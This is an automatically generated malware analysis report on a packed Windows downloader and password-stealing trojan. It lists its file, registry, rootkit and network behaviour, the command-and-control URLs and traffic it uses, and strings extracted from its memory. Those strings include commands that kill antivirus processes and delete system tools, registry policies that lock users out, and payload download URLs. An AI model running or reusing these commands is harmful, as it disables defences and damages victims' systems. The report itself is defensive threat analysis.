Packed.Win32.Themida_5fbe412824

by malwarelabrobot on September 29th, 2016 in Malware Descriptions.

Packed.Win32.Themida.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan-PSW.Win32.Bzub.2.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, PackedThemida.YR, GenericInjector.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm, Packed


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 5fbe412824a59a573d118d13a7a1ef57
SHA1: e2c52c132da795c364d932f0a277928b19dd9803
SHA256: 8f3563891f1eb7ca8c5d7cbde6528e7ff0dc81fcca11bf8cd660860a694c3e6b
SSDeep: 196608:oxx9hcbHDNSPFYmrweyW1bxPTQw1aBVg1I/fAKncxd52UiwQenwwmKE1:6hcTDYPLrwdqGugfPgD2UzwrK
Size: 12238848 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-11 18:41:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Packed. A packed file is compressed and/or encrypted in a manner that prevents matching the memory image of that file against the actual file on disk. Sometimes used for copy protection, packers are often used to make spyware harder to analyze or detect.

Payload

Behaviour   Description
EmailWorm   Worm can send e-mails.


Process activity

The Packed creates the following process(es):
No processes have been created.
The Packed injects its code into the following process(es):

%original file name%.exe:1612

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1612 makes changes in the file system.
The Packed creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (380 bytes)
%WinDir%\qfx86.sys (188 bytes)
%Documents and Settings%\%current user%\Desktop\ÓÎÐÐ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Packed deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\user[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\user[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:1612 makes changes in the system registry.
The Packed creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1916x902x32(BGR 0)" = "31,31,31,31"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 B4 AD 22 87 B0 11 18 69 10 4A 5F 9A 07 4F 42"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Packed modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Packed modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Packed modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Packed deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
93ea8d04ec73a85db02eb8805988f733 c:\WINDOWS\qfx86.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%WinDir%\qfx86.sys", the Packed controls the loading of executable images into memory by installing a load-image notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name       Virtual Address  Virtual Size  Raw Size  Entropy    Section MD5
(none)     4096             14766080      9818112   5.52117    0ef4bf2c80b4498d7504a253ee8aa031
.rsrc      14770176         35708         20480     5.08802    7d5fcce021a7c04348993be990c5e3fa
.idata     14807040         4096          4096      0.153156   b30d088ca268e069795e70f7a6082fb7
(none)     14811136         4055040       4096      0.029229   15ee9bbf38f95f7a37edd52c741efa08
tvtnwrsd   18866176         2383872       2383872   5.51636    ccdacbc00944c1f913eeab11d3698d46
wzjrzyzv   21250048         4096          4096      0.421445   5689a2a6fe1c2086ffb23e499492f3a4

URLs

URL IP
hxxp://www.yy171.com/x86.jpg 59.56.97.48
hxxp://qxw1001940641.my3w.com/ 121.42.134.98
hxxp://qxw1001940641.my3w.com/b/user.asp 121.42.134.98
hxxp://qxw1001940641.my3w.com/yx448.html 121.42.134.98
hxxp://www.yy171.com/cloud32.jpg 59.56.97.48
hxxp://tp.cq738.com/cloud32.jpg 59.56.97.48


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /yx448.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: qxw1001940641.my3w.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 11 Sep 2016 15:44:13 GMT
Accept-Ranges: bytes
ETag: "5846815843cd21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:39 GMT
Content-Length: 400



POST /b/user.asp HTTP/1.1
Referer: hXXp://qxw1001940641.my3w.com/b/user.asp
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: qxw1001940641.my3w.com
Content-Length: 32
Cache-Control: no-cache
Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH

cmd=5&j=CQJS000C290DDD4A4095406E

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 362
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:40 GMT


GET /x86.jpg HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.yy171.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 27 Sep 2016 22:37:45 GMT
Content-Length: 188416
Content-Type: image/jpeg
Content-Location: hXXp://VVV.yy171.com/x86.jpg
Last-Modified: Wed, 12 Sep 2012 04:53:08 GMT
Accept-Ranges: bytes
ETag: "688ccc80a290cd1:494a"
Server: Microsoft-IIS/6.0

GET / HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qxw1001940641.my3w.com
Connection: Keep-Alive




HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Sat, 18 Jun 2016 06:13:51 GMT
Accept-Ranges: bytes
ETag: "f031749528c9d11:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:36 GMT
Content-Length: 8355

GET /b/user.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: qxw1001940641.my3w.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:38 GMT
Content-Length: 140



POST /b/user.asp HTTP/1.1
Referer: hXXp://qxw1001940641.my3w.com/b/user.asp
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: qxw1001940641.my3w.com
Content-Length: 32
Cache-Control: no-cache
Cookie: ASPSESSIONIDQADDASTQ=HDHLJGHBCKFIGAKIHDKDKFHH

cmd=c&j=CQJS000C290DDD4A4095406E

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2016 22:42:39 GMT

ConnectionOk


GET /cloud32.jpg HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: tp.cq738.com
Connection: close


HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Sep 2016 22:38:01 GMT
Content-Length: 11572
Content-Type: image/jpeg
Content-Location: hXXp://tp.cq738.com/cloud32.jpg
Last-Modified: Mon, 19 Sep 2016 14:51:23 GMT
Accept-Ranges: bytes
ETag: "1d16734a8512d21:48aa"
Server: Microsoft-IIS/6.0

HEAD /cloud32.jpg HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: tp.cq738.com
Connection: close


HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Sep 2016 22:38:00 GMT
Content-Length: 11572
Content-Type: image/jpeg
Content-Location: hXXp://tp.cq738.com/cloud32.jpg
Last-Modified: Mon, 19 Sep 2016 14:51:23 GMT
Accept-Ranges: bytes
ETag: "1d16734a8512d21:48aa"
Server: Microsoft-IIS/6.0


The Packed connects to the servers at the following location(s):

%original file name%.exe_1612_rwx_00401000_00E15000:

kernel32.dll
user32.dll
wininet.dll
advapi32.dll
Winmm.dll
yx.dll
ntdll.dll
NTDLL.DLL
shell32.dll
kernel32.DLL
Kernel32.dll
atl.dll
shlwapi.dll
Shlwapi.dll
EnumWindows
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ExitWindowsEx
CreateWindowStationA
CloseWindowStation
GetAsyncKeyState
MsgWaitForMultipleObjects
ShellExecuteA
GetWindowsDirectoryA
{84A90340-1CE7-4C96-8FFC-FB0124DE9AD7}
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
{0A47829F-FBB4-4442-AB25-69159D4CBAF6}
hXXp://wpa.qq.com/msgrd?v=3&uin=2991425581&site=qq&menu=yes
yxbsq.ini
uPassword
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
SoundRecorder.exe
c:\windows\sysnative\SoundRecorder.exe
\taskmgr.exe
.rsrc
.idata
comctl32.dll
<assemblyIdentity version="1.0.0.0" name=".add"/>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
Gdi32.dll
User32.dll
Mpr.dll
Advapi32.dll
Shell32.dll
winmm.dll
taskkill /f /im kavsvc.exe
taskkill /f /im KVXP.kxp
taskkill /f /im Rav.exe
taskkill /f /im Ravmon.exe
taskkill /f /im Mcshield.exe
taskkill /f /im VsTskMgr.exe
SOFTWARE\360Safe\safemon\ExecAccess
taskkill /f /im 360tray.exe
.txt\
.inf\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
del /f /s /q /a %SystemRoot%\system32\*.msc
Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe
\system32\reg.bat
\system32\reg.reg
regedit /s reg.reg
assoc .exe=exefile
.reg\
.exe\
\\.\\physicaldrive0Session Manager
\qfx64.sys
hXXp://VVV.yy171.com/x64.jpg
\qfx86.sys
hXXp://VVV.yy171.com/x86.jpg
DrvAnti.exe
hXXp://qxw1001940641.my3w.com/b/user.asp\
@\\.\
,Step &into,Step &over,Animate into,Animate over,Execute till return,Debugging &options,&Just-in-time debugging,Select A&PI help file,SEH chain,Call stac&k,&Breakpoints,Ru&n trace,
(&S),&Attach,VEH/SEH chain,INT3 &breakpoints,Call DLL export Alt F6,Run thread F11,Set condition... Ctrl T,&Options... Alt O,Stop hit trace,Run hit trace,Execute till return Ctrl F9
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
\xodriver.dll
.text
h.rdata
H.data
.pdata
.vmp0
.vmp1
.reloc
.di1zg
hal.dll
kp".JZR
ntoskrnl.exe
N=(xdzVD0.ZR
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\objfre_win7_amd64\amd64\XODriverWin7AMD64.pdb
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<a href="javascript:history.back(1)">
<h2>HTTP
<a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft
“HTTP”
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\cmddispatch.c
count is %d
\SystemRoot\system32\%s
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\driverentry.c
system not support.
Warning: OnDeviceControl unknown DeviceObject: X.
c:\users\chandler\desktop\jinshu\20151029-src\xodriver\objfre_wxp_x86\i386\XODriverWinXPx86.pdb
h.zlB
Qntoskrnl.exe
c:\jqm.ini
Set mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration")
If mo.IPEnabled=True Then
MACAddress= mo.MacAddress
wshom.ocx
WindowStyle
Hotkey
hXXp://VVV.yxbsq.com
hXXp://VVV.yxbsq.com/show.asp?id=63
hXXp://baidu.com
WinHttp.WinHttpRequest.5.1
/123.123
.oTr~
/%x(Y
wntdll.dll
gdi32.dll
ws2_32.dll
Windows 10
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
Windows 8.1
Windows 8
Windows Server 2012
Windows 7
Windows Server 2008 R2
Windows Vista
Windows Server 2008
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows 2000
Windows NT 4.0
Windows 95
Windows 98
Windows Me
Web Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
hXXp://VVV.yxbsq.com/show.asp?id=66
00000001
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDLL
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRemoteRecursiveEvents
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RemoteComputer\NameSpace\
DLLHOST.EXE,MMC.EXE,RUNDLL32.EXE
4294967197
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable
SYSTEM\ControlSet002\Control\Windows\NoPopUpsOnBoot
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\legalnoticecaption
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\legalnoticetext
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon
Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Use Search Asst
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DisableThumbnailCache
SOFTWARE\Policies\Microsoft\Windows\DriverSearching\DontSearchWindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz\NoRun
Software\Microsoft\Office\11.0\Common\DWNoExternalURL
SOFTWARE\Policies\Microsoft\WindowsMediaPlayer\DisableAutoUpdate
SOFTWARE\Microsoft\PCHealth\ErrorReporting\AllOrNone
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeKernelFaults
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeMicrosoftApps
SOFTWARE\Microsoft\PCHealth\ErrorReporting\IncludeWindowsApps
SOFTWARE\Microsoft\PCHealth\ErrorReporting\DoReport
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
hXXp://VVV.yxbsq.com/list.asp?classid=6
\yxbs.dll
taskmgr.exe
\yx.dll
`.text
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>
{.kx&da
pLp3p2p.oD
"#$%&'()
* ,-./01
23456789
EM32'bs k.DL
.dli$
.tex8
h.rdat
HAL.dl
%fYPn
.LL9z
1@90%sw
W)_U.GG
0123456
'?(?)?*3 !,
&='>(?)1*
[9@\:] ^
=YS[D.gxE="?"
Ou%%C
;^.djt
